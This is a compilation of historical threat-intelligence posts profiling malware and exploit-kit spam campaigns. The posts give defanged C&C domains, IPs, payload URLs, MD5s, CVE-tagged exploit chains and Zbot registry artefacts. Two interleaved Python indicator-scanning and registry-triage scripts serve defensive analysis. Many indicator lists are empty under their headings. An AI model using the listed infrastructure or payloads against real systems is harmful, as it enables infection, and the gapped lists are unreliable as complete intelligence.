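# Constructed sample input: three Squid-style access log lines.
SAMPLE_LOG = """
1380412800.123 245 10.0.0.15 TCP_MISS/200 5123 GET http://pizzapluswindsor.ca/topic/latest-blog-news.php - HIER_DIRECT/50.116.6.57 text/html
1380412801.456 120 10.0.0.16 TCP_MISS/200 812 GET http://www.example.org/index.html - HIER_DIRECT/93.184.216.34 text/html
1380412802.789 300 10.0.0.17 TCP_MISS/200 4096 GET http://91.201.196.99/gate.php - HIER_DIRECT/91.201.196.99 application/octet-stream
"""

MD5_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://(\S+)", re.I)  # defanged or live scheme
DOMAIN_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)

@dataclass
class IndicatorSet:
    domains: set = field(default_factory=set)
    ips: set = field(default_factory=set)
    md5s: set = field(default_factory=set)
    emails: set = field(default_factory=set)

def is_ipv4(token: str) -> bool:
    """True only for dotted quads whose four octets are all within 0..255."""
    return bool(IPV4_RE.fullmatch(token)) and all(int(o) <= 255 for o in token.split("."))

def url_host(url_rest: str) -> str:
    # Hostname from the part of a URL after the scheme: no path, port or case.
    return url_rest.split("/")[0].split(":")[0].lower()

def add_host(iocs: IndicatorSet, host: str) -> None:
    """Route a host to the IP or domain set; drop tokens that are neither."""
    host = host.lower()
    if is_ipv4(host):
        iocs.ips.add(host)
    elif DOMAIN_RE.match(host):
        iocs.domains.add(host)

def parse_indicator_lines(text: str) -> IndicatorSet:
    """Extract domains, IPs, MD5s and e-mails from lines in the posts' notation."""
    iocs = IndicatorSet()
    for raw in text.splitlines():
        line = raw.strip().lstrip("-").strip()  # drop chain indentation "    - "
        if not line:
            continue
        iocs.md5s.update(h.lower() for h in MD5_RE.findall(line))
        iocs.emails.update(e.lower() for e in EMAIL_RE.findall(line))
        # Blank out e-mails first so a registrant's mail provider (gmail.com)
        # is never recorded as a malicious domain.
        scrubbed = EMAIL_RE.sub(" ", line)
        iocs.ips.update(ip for ip in IPV4_RE.findall(scrubbed) if is_ipv4(ip))
        for m in URL_RE.finditer(scrubbed):
            add_host(iocs, url_host(m.group(1)))
        tokens = scrubbed.split()
        if tokens and "://" not in tokens[0]:  # bare domain: "wemhkr3t4z.com - ..."
            add_host(iocs, tokens[0])
    return iocs

def match_log_line(line: str, iocs: IndicatorSet) -> list:
    """Sorted (kind, value) hits: hostnames, IPv4s and 32-hex tokens in the set."""
    hits = set()
    for m in URL_RE.finditer(line):
        host = url_host(m.group(1))
        if host in iocs.domains:
            hits.add(("domain", host))
    for ip in IPV4_RE.findall(line):
        if ip in iocs.ips:
            hits.add(("ip", ip))
    for h in MD5_RE.findall(line):
        if h.lower() in iocs.md5s:
            hits.add(("md5", h.lower()))
    return sorted(hits)

def scan_log(log_text: str, iocs: IndicatorSet) -> list:
    """(line_number, hits) for every log line with at least one indicator hit."""
    results = []
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        hits = match_log_line(line, iocs)
        if hits:
            results.append((n, hits))
    return results

if __name__ == "__main__":
    iocs = parse_indicator_lines(INDICATOR_LINES)
    for n, hits in scan_log(SAMPLE_LOG, iocs):
        print(f"log line {n}: {hits}")
```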

Related malicious MD5s known to have responded to the same C&C server IP (208.87.35.103):

Once executed, a sample malware (MD5: a12c055f201841f4640084a70b34c0c4) phones back to the following C&C server IPs:

Once executed, a sample malware (MD5: 2782220da587427b981f07dc3e3e0d96) phones back to the following C&C server IPs:
hxxp://lafyeri.com
hxxp://kulppasur.com - 209.222.14.3
hxxp://toalladepapel.com.ar - 184.168.57.1
hxxp://www.ecole-saint-simon.net - 208.87.35.103

Once executed, a sample malware (MD5: 2539d5d836f058afbbf03cb24e41970c) phones back to the following C&C server IP:
hxxp://realquickmedia.com (208.87.35.103)

Related malicious domains known to have responded to the same malicious C&C server IP (109.74.195.149):

Related malicious MD5s known to have phoned back to the same malicious C&C server IP (109.74.195.149):

Once executed, a sample malware (MD5: a6c06a59da36ee1ae96ffaff37d12f28) phones back to the following malicious C&C server IPs:
hxxp://replost.com - 109.74.195.149
hxxp://zeplost.com - 109.74.195.149

Once executed, a sample malware (MD5: 2d1bb6ca54f4c093282ea30e2096af0f) phones back to the following malicious C&C server IP:
hxxp://qweplost.com - 109.74.195.149

Related malicious domains known to have responded to the same malicious C&C server IP (96.126.106.156):

Related malicious MD5s known to have phoned back to the same malicious C&C server IPs:

Once executed, a sample malware (MD5: 0183a687365cc3eb97bb5c2710952f95) phones back to the following malicious C&C server IP:
hxxp://replost.com - 96.126.106.156

Once executed, a sample malware (MD5: f1e3030a83fa2f14f271612a4de914cb) phones back to the following malicious C&C server:
hxxp://gercourses.com/borders.php

Once executed, a sample malware (MD5: 97269450de58ef5fb8d449008e550bf0) phones back to the following malicious C&C server IP:
hxxp://checkwebspeed.net - 96.126.106.156

Once executed, a sample malware (MD5: c83962659f6773b729aa222bd5b03f2f) phones back to the following malicious C&C server IP:
hxxp://checkwebspeed.net - 96.126.106.156

Once executed, a sample malware (MD5: e0aa08d4d98c3430204c1bb6f4c980e1) phones back to the following malicious C&C server IP:
hxxp://replost.com - 96.126.106.156

We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Zeus and Client-Side Exploit Serving Facebook Phishing Campaign Spotted in the Wild

December 23, 2016
In a cybercrime ecosystem dominated by fraudulent propositions, cybercriminals continue actively populating their botnets' infected population with hundreds of thousands of newly affected users globally, potentially exposing the confidentiality, integrity and availability of the affected hosts to a multitude of malicious software, and earning fraudulent revenue in the process of monetizing the affected botnet's population, largely relying on an affiliate-based fraudulent revenue monetization scheme.

We've recently intercepted a currently circulating malicious spam campaign impersonating Facebook for the purpose of serving client-side exploits to socially engineered users, further exposing the confidentiality, integrity and availability of the affected hosts to a multitude of malicious software, and earning fraudulent revenue in the process of monetizing the affected hosts, largely relying on an affiliate-based fraudulent revenue monetization scheme.

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample URL exploitation chain:
hxxp://auth.facebook.com.megavids.org/id735rp/LoginFacebook.php
    - hxxp://wqdfr.salefale.com/index.php - 62.193.127.197
        - hxxp://spain.salefale.com/index.php

Related malicious domains known to have participated in the campaign:
hxxp://salefale.com - 112.137.165.114
    - hxxp://countrtds.ru - 91.201.196.102 - Email: thru@freenetbox.ru
       
Sample detection rate for the malicious executable:
MD5: e96c8d23e3b64d79e5e134a9633d6077
MD5: 19d9cc4d9d512e60f61746ef4c741f09

Once executed, a sample malware phones back to:
hxxp://makotoro.com

Related malicious C&C server IPs known to have participated in the campaign:

Related malicious C&C server IPs (212.175.173.88) known to have participated in the campaign:

We'll continue monitoring the campaign and post updates as soon as new developments take place.

Historical OSINT - Spamvertised Client-Side Exploits Serving Adult Content Themed Campaign

December 23, 2016
There's no such thing as free porn, unless client-side exploits are served.

We've recently intercepted a currently circulating malicious spam campaign enticing end users into clicking on malware-serving, client-side-exploit-embedded content for the purpose of affecting a socially engineered user's host, further monetizing access by participating in a rogue affiliate-network based monetization scheme.

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it, and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample malicious URL known to have participated in the campaign:
hxxp://jfkweb.chez.com/HytucztXRs.html? -> hxxp://aboutg.dothome.co.kr/bbs/theme_1_1_1.php -> http://aboutg.dothome.co.kr/bbs/theme_1_1_1.php?s=hvqCgoLEI&id=6 -> http://aboutg.dothome.co.kr/bbs/theme_1_1_1.php?s=hvqCgoLEI&id=14 -> hxxp://meganxoxo.com - 74.222.13.2 - associated name servers: ns1.tube310.info; ns2.tube310.info - 74.222.13.24

Parked there (74.222.13.2) are also:
hxxp://e-leaderz.com - Email: seoproinc@gmail.com
hxxp://babes4you.info - 74.222.13.25
hxxp://tubexxxx.info
hxxp://my-daddy.info - 74.222.13.25

Related malicious URLs known to have participated in the campaign:

The exploitation structure is as follows:
hxxp://meganxoxo.com/xox/go.php?sid=6 -> hxxp://kibristkd.org.tr/hasan-ikizer/index01.php -> hxxp://fd1a234sa.com/js - 79.135.152.26 -> hxxp://asf356ydc.com/qual/index.php - CVE-2008-2992; CVE-2009-0927; CVE-2010-0886 -> hxxp://asf356ydc.com/qual/52472f502b9688d3326a32ed5ddd5d2c.js ->  hxxp://asf356ydc.com/qual/abe9c321312b206bffa798ef9d5b6a9b.php?uid=206369 -> hxxp://188.243.231.39/public/qual.jar ->  hxxp://asf356ydc.com/qual/load.php/0a3584217553d6fccbd74cfb73e954b6?forum=thread_id -> hxxp://asf356ydc.com/download/stat.php -> hxxp://asf356ydc.com/download/load/load.exe

Related malicious URLs known to have participated in the campaign:
hxxp://jfkweb.chez.com/frank4.html - CVE-2010-0886
    - hxxp://jfkweb.chez.com/bud2.html
        - hxxp://jfkweb.chez.com/4.html
            - hxxp://wemhkr3t4z.com/qual/load/myexebr.exe
                - hxxp://asf356ydc.com/download/index.php
                    - hxxp://89.248.111.71/qual/load.php?forum=jxp&ql
                        - hxxp://asf356ydc.com/qual/index.php

Related malicious URLs known to have participated in the campaign:
hxxp://qual/10964108e3afab081ed1986cde437202.js
hxxp://qual/768a83ea36dbd09f995a97c99780d63e.php?spn=2&uid=213393&
hxxp://qual/index.php?browser_version=6.0&uid=213393&browser=MSIE&spn=2

Related malicious URLs known to have participated in the campaign:
hxxp://download/banner.php?spl=javat
hxxp://download/j1_ke.jar
hxxp://download/j2_93.jar

Parked on 89.248.111.71, AS45001, Interdominios_ono Grupo Interdominios S.A.:
wemhkr3t4z.com - Email: fole@fox.net - MD5: 3b375fc53207e1f54504d4b038d9fe6b

Related malicious MD5s known to have participated in the campaign:
hxxp://alhatester.com/cp/file.exe - 204.11.56.48; 204.11.56.45; 8.5.1.46; 208.73.211.230; 208.73.211.247; 208.73.211.249; 208.73.211.246; 208.73.211.233; 208.73.211.238; 208.73.211.208

Known to have phoned back to the same malicious C&C server IPs are also the following malicious MD5s:

Once executed, a sample malware (MD5: 89fb419120d1443e86d37190c8f42ae8) phones back to the following C&C server IPs:

Once executed, a sample malware (MD5: 3194e6282b2e51ed4ef186ce6125ed73) phones back to the following malicious C&C server IPs:

Once executed, a sample malware (MD5: 7f42da8b0f8542a55e5560e86c4df407) phones back to the following malicious C&C server IPs:

Once executed, a sample malware (MD5: f8bdc841214ae680a755b2654995895e) phones back to the following malicious C&C server IPs:

Once executed, a sample malware phones back to the following malicious C&C server IPs:
hxxp://v00d00.org/nod32/grabber.exe - 67.215.238.77; 67.215.255.139; 184.168.221.87

Related malicious MD5s known to have phoned back to the same C&C server IP (67.215.238.77):
MD5: 1233c86d3ab0081b69977dbc92f238d0

Known to have responded to the same malicious IPs are also the following malicious domains:
hxxp://blog.symantecservice37.com
hxxp://agoogle.in
hxxp://adv.antivirup.com
hxxp://cdind.antivirup.com

Once executed, a sample malware phones back to the following C&C server:
hxxp://v00d00.org/nod32/update.php

Known to have responded to the same malicious IP (67.215.255.139) are also the following malicious domains:

Related malicious MD5s known to have phoned back to the same malicious C&C server IP (67.215.255.139):

Known to have responded to the same malicious C&C server IP (184.168.221.87) are also the following malicious domains:

Related malicious MD5s known to have phoned back to the same malicious C&C server IP (184.168.221.87):
MD5: 037f8120323f2ddff3c806185512538c

Once executed, a sample malware (MD5: 037f8120323f2ddff3c806185512538c) phones back to the following C&C server:
hxxp://porno-kuba.net/emo/ld.php?v=1&rs=1819847107&n=1&uid=1

Once executed, a sample malware (MD5: 44f0e8fe53a3b489cb5204701fa1773d) phones back to the following C&C server IPs:

Sample malicious URLs known to have participated in the campaign:
hxxp://portinilwo.com/nhjq/n09230945.asp
    - hxxp://portinilwo.com/botpanel/sell2.jpg
        - hxxp://portinilwo.com/boty.dat
            - hxxp://91.188.60.161/botpanel/sell2.jpg
                - hxxp://91.188.60.161/botpanel/ip.php

Once executed, a sample malware phones back to the following C&C server:
asf356ydc.com - MD5: 3b375fc53207e1f54504d4b038d9fe6b

Related malicious domains known to have participated in the campaign:
asf356ydc.co
kaljv63s.com
sadkajt357.com

We'll continue monitoring the fraudulent infrastructure and post updates as soon as new developments take place.

Malicious Client-Side Exploits Serving Campaign Intercepted, Thousands of Users Affected

April 26, 2016
We've recently intercepted a currently circulating malicious campaign utilizing a variety of compromised Web sites for the purpose of serving malicious software to socially engineered users.

In this post we'll profile the campaign and the infrastructure behind it, provide actionable intelligence and MD5s, and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample malicious URL:
hxxp://directbalancejs.com/module.so - 37.48.116.208; 31.31.204.161

Known to have phoned back to the same malicious C&C server (31.31.204.161) is also the following malicious MD5:
MD5: c3754018dab05b3b8aac5fe8100076ce

Once executed the sample phones back to the following C&C server:
hxxp://info-get.ru - 31.31.204.161

Known to have phoned back to the same malicious C&C server (31.31.204.161) are also the following malicious MD5s:

This post has been reproduced from Dancho Danchev's blog.

Malicious Script Artifacts at China Green Dot Gov Dot Cn - A Reminiscence of Asprox's Multi-Tasking Activities

November 04, 2013

Malware artifacts, abandoned mass iframe embedding/injection campaigns, and low Quality Assurance (QA) campaigns continue popping up on everyone's radar, raising eyebrows as to the extent of incompetence, possible evasive tactics, plain lack of applied QA when maintaining these campaigns, or the end of a campaign's life cycle.

What's the value of assessing such a non-active campaign? Can the analysis provide any clues into related, currently active malicious campaigns that, as is typical for this type of campaign, continue relying on the same malicious infrastructure? But of course.

Let's assess the malicious artifacts at hxxp://chinagreen.gov.cn, connect them to the multi-tasking activities conducted on behalf of the Asprox botnet, as well as several spamvertised malware campaigns circa 2010, and most importantly provide actionable intelligence on currently active campaigns that continue using the very same infrastructure for command and control purposes.

Malicious scripts at China Green Dot Gov Dot CN:
update.webserviceftp.ru/js.js - seen in "Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign"
gdi.webserviceftp.ru/js.js - seen in "Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign"
ver.webserivcekota.ru/js.js - seen in "Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign"
batch.webserviceaan.ru/js.js - seen in "Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign"
nemohuildiin.ru/tds/go.php?sid=1 - seen in "Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign"
parkperson.ru:8080/index.php?pid=13 - seen in "Spamvertised Best Buy, Macy's, Evite and Target Themed Scareware/Exploits Serving Campaign"
nutcountry.ru:8080/index.php?pid=13 - seen in "Spamvertised Best Buy, Macy's, Evite and Target Themed Scareware/Exploits Serving Campaign"

What's so special about the spamvertised Xerox WorkCentre Pro campaign is that, back in 2010, it used to drop an Asprox sample, naturally phoning back to well-known Asprox C&Cs at the time.

nemohuildiin.ru is known to have responded to 31.31.204.61 and, most recently, to 5.63.152.19.

Known to have responded to the same IP (31.31.204.61) are also the following malicious domains:

Moreover, we also have a decent number of malicious MD5s known to have used the same IP as C&C over the last couple of months, indicating that the artifact is still part of the C&C infrastructure of active campaigns.

The following malicious MD5s are also known to have phoned back to the same IP over the last couple of months:

Known to have responded to 5.63.152.19 are also the following malicious domains:

In a cybercrime ecosystem dominated by leaked DIY mass Web site hacking tools, and sophisticated iframe-ing platforms, malicious artifacts are a great reminder that as long as the Web site remains susceptible to remote exploitation, it's only a matter of time before a potential cybercriminal embeds/injects malicious script on it. That's cybercrime-friendly common sense.

Updates will be posted as soon as new developments take place.

Fake Pinterest 'Don't forget to confirm your email!' Themed Emails Serve Client-side Exploits and Malware

October 01, 2013

Cybercriminals have just launched yet another massive spam campaign, this time attempting to trick Pinterest users into thinking that they've received an email confirmation request. In reality though, once users click on the links found in the malicious emails, they're automatically exposed to client-side exploits, with the campaign dropping two malware samples on the affected hosts once a successful client-side exploitation takes place.

Let's dissect the campaign, expose the malicious portfolio of domains involved in it, provide MD5s of the served malware as well as a sample exploit, and provide actionable (historical) intelligence regarding related malicious activities that have been taking place using the same infrastructure that's involved in the Pinterest campaign.

Spamvertised malicious URL: 
boxenteam.com/hathaway/index.html?emailmpss/PSEUDO_RANDOM_CHARACTERS

Attempts to load the following malicious scripts:
theodoxos.gr/hairstyles/defiling.js
web29.webbox11.server-home.org/volleyballs/cloture.js
knopflos-combo.de/subdued/opposition.js


Sample client-side exploits serving URL:
pizzapluswindsor.ca/topic/latest-blog-news.php

Malicious domain name reconnaissance:
pizzapluswindsor.ca - 50.116.6.57; 174.140.169.145

Responding to the same IP (50.116.6.57) are also the following malicious domains, part of the campaign's infrastructure:

Known to have responded to the second IP (174.140.169.145) are also the following malicious domains:

The following malicious MD5s are known to have phoned back to the same IP on the 22nd of September, 2013:

Detection rate for a sample served exploit from the Pinterest themed campaign: 
MD5: d49275523cae83a5e7639bb22604dd86 - detected by 5 out of 48 antivirus scanners as HEUR:Exploit.Java.CVE-2012-1723.gen

Upon successful client-side exploitation, the campaign drops two malware samples on the affected hosts.

Detection rate for the first dropped sample: 
MD5: ae840d6ac2f02b4bff85182d2c72a053 - detected by 6 out of 48 antivirus scanners as UDS:DangerousObject.Multi.Generic

Once executed, it phones back to the following C&C:
78.140.131.151/uploading/id=REDACTED&u=PSEUDO_RANDOM_CHARACTERS

The following malicious MD5s are also known to have phoned back to the following C&C IP (78.140.131.151) in the past:

Detection rate for the second dropped sample:
MD5: 83bbe52c8584a5dab07a11ecc5aaf090 - detected by 3 out of 48 antivirus scanners as Trojan-Spy.Win32.Zbot.qgje; Trojan.Backdoor.RV

Once executed, it starts listening on ports 7867 and 1653.

The sample then creates the following Mutexes on the affected hosts:

Once executed, it also drops MD5: 2da7bbc5677313c2876b571b39edc7cf and MD5: 83bbe52c8584a5dab07a11ecc5aaf090 on the affected hosts.

It then phones back to the following C&C (command and control servers):

We've already seen (some of) these C&C IPs in the following profiled malicious campaign "Spamvertised Facebook 'You have friend suggestions, friend requests and photo tags' Themed Emails Lead to Client-side Exploits and Malware".

Updates will be posted as soon as new developments take place.

Spamvertised Facebook 'You have friend suggestions, friend requests and photo tags' Themed Emails Lead to Client-side Exploits and Malware

September 28, 2013

A currently circulating malicious 'Facebook notifications' themed spam campaign attempts to trick Facebook's users into thinking that they've received a notifications digest for the activity that (presumably) took place while they were logged out of Facebook. In reality, once users click on any of the links found in the malicious email, they're automatically exposed to client-side exploits that ultimately drop malware on their hosts.

Let's dissect the campaign, provide actionable intelligence on the campaign's structure, the involved portfolio of malicious domains, actual/related MD5s, and as always, connect the currently ongoing campaign with two other previously profiled malicious campaigns.

Spamvertised URL:
hxxp://user4634.vs.easily.co.uk/darkened/PSEUDO_RANDOM_CHARACTERS

Attempts to load the following malicious scripts:
hxxp://3dbrandscapes.com/starker/manipulator.js
hxxp://distrigold.eu/compounding/melisa.js
hxxp://ly-ra.com/shallot/mandalay.js

Client-side exploits serving URL:
hxxp://directgrid.org/topic/lairtg-nilles-slliks.php

Malicious domain name reconnaissance:
directgrid.org - 50.116.10.71 - Email: ringfields@islandresearch.net

Also responding to the same IP (50.116.10.71) are the following malicious domains participating in the campaign:

The following malicious MD5s, from related campaigns, are known to have been downloaded from the same IP (50.116.10.71):
MD5: 7eb6740ed6935da49614d95a43146dea
MD5: 7768f7039988236165cdd5879934cc5d

The following malicious MD5s are known to have 'phoned back' to the same IP (50.116.10.71) over the past 24 hours:

Sample detection rate for the client-side exploits serving malicious script:
MD5: 00f5d150ff1b50c0bbc1d038eb676c29 - detected by 2 out of 48 antivirus scanners as Script.Exploit.Kit.C; Troj/ObfJS-EO

Sample detection rate for the served exploit:
MD5: d49275523cae83a5e7639bb22604dd86 - detected by 5 out of 48 antivirus scanners as HEUR:Exploit.Java.Generic; HEUR_JAVA.EXEC; TROJ_GEN.F47V0927

Upon successful client-side exploitation the campaign drops the following malicious sample on the affected hosts:
MD5: 6ef9476e6227ef631b231b66d7a2a08b - detected by 7 out of 48 antivirus scanners as Win32/Spy.Zbot.AAU; Trojan-Spy.Win32.Zbot.qckm; TROJ_GEN.F47V0927

Once executed, the sample starts listening on ports 3185 and 7101.

It also creates the following Mutexes on the system:

It also creates the following Registry Key:
HKEY_CURRENT_USER\Software\Microsoft\Waosumag

And changes the following Registry Values:

[HKEY_CURRENT_USER\Identities] -> Identity Login = 0x00098053
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] -> Keby = "%AppData%\Ortuet\keby.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Waosumag] -> 2df3e6ig = 23 CD 87 C3 1E D1 FA C6 28 2E DF 4D 12 21; 2icbbj3a = 0xC3E6CD13; 185cafc2 = CB D5 E6 C3 F6 D8 CD C6 05 2E EF 4D
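The two registry artefacts above (an autostart entry pointing into %AppData% and an unfamiliar HKCU\Software\Microsoft\ subkey holding opaque byte blobs under random-looking value names) are the kind of sandbox output a defender can triage automatically. The following Python is an added example, not code from the original post or from any tool it mentions; it parses the "[KEY] -> name = value; name = value" lines in the shape the post uses and applies two heuristics (the 8-character mixed-alphanumeric value-name pattern is an assumption of this example, not something the post states).

```python
import re

# Constructed sample input: the registry changes quoted in the write-up above,
# in the "[KEY] -> name = value; name = value" shape the post uses.
SANDBOX_LINES = [
    r'[HKEY_CURRENT_USER\Identities] -> Identity Login = 0x00098053',
    r'[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] -> Keby = "%AppData%\Ortuet\keby.exe"',
    r'[HKEY_CURRENT_USER\Software\Microsoft\Waosumag] -> 2df3e6ig = 23 CD 87 C3 1E D1 FA C6 28 2E DF 4D 12 21; '
    r'2icbbj3a = 0xC3E6CD13; 185cafc2 = CB D5 E6 C3 F6 D8 CD C6 05 2E EF 4D',
]

LINE_RE = re.compile(r'^\[(?P<key>[^\]]+)\]\s*->\s*(?P<values>.+)$')
AUTORUN_SUFFIXES = (r'\software\microsoft\windows\currentversion\run',
                    r'\software\microsoft\windows\currentversion\runonce')
USER_WRITABLE = ('%appdata%', '%localappdata%', '%temp%', '%userprofile%')
HKCU_MS_PREFIX = 'hkey_current_user\\software\\microsoft\\'
HEX_BLOB_RE = re.compile(r'^(?:[0-9A-F]{2} )+[0-9A-F]{2}$')      # "23 CD 87 ..." style data
RANDOM_NAME_RE = re.compile(r'^(?=.*\d)(?=.*[a-z])[0-9a-z]{8}$')  # heuristic (assumption): 8 mixed chars

def parse_line(line):
    """Split one '[KEY] -> a = b; c = d' line into (key, {name: data})."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f'unrecognised sandbox line: {line!r}')
    values = {}
    for part in m.group('values').split('; '):
        name, _, data = part.partition(' = ')
        values[name.strip()] = data.strip().strip('"')   # also drops doubled export quotes
    return m.group('key'), values

def find_findings(lines):
    """Return (rule, key, value_name, data) tuples for suspicious registry changes."""
    findings = []
    for line in lines:
        key, values = parse_line(line)
        key_l = key.lower()
        if key_l.endswith(AUTORUN_SUFFIXES):
            # Autostart entry whose image lives in a user-writable profile location
            for name, target in values.items():
                if target.lower().startswith(USER_WRITABLE):
                    findings.append(('autorun_in_user_profile', key, name, target))
        elif key_l.startswith(HKCU_MS_PREFIX) and '\\' not in key_l[len(HKCU_MS_PREFIX):]:
            # Vendor-looking subkey directly under HKCU\Software\Microsoft holding opaque blobs
            for name, data in values.items():
                if RANDOM_NAME_RE.match(name) and HEX_BLOB_RE.match(data):
                    findings.append(('opaque_blob_under_hkcu_microsoft', key, name, data))
    return findings

if __name__ == '__main__':
    for finding in find_findings(SANDBOX_LINES):
        print(*finding, sep=' | ')
```

On the three lines above it reports the Run entry and the two raw-byte values under Waosumag, and ignores the 0x-style DWORD and the Identities change.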

It then phones back to the following C&C (command and control) servers:

We've already seen the same IPs (217.35.75.232; 108.240.232.212) in the following previously profiled malicious campaign - Spamvertised “FDIC: Your business account” themed emails serve client-side exploits and malware.

We've also seen (107.193.222.108) in the following malicious campaign - Spamvertised ‘Export License/Invoice Copy’ themed emails lead to malware, indicating that all of these campaigns are controlled using the same malicious botnet infrastructure.

The following malicious MD5s are also known to have phoned back to the same C&C servers used in this campaign, over the past 24 hours:

Updates will be posted as soon as new developments take place.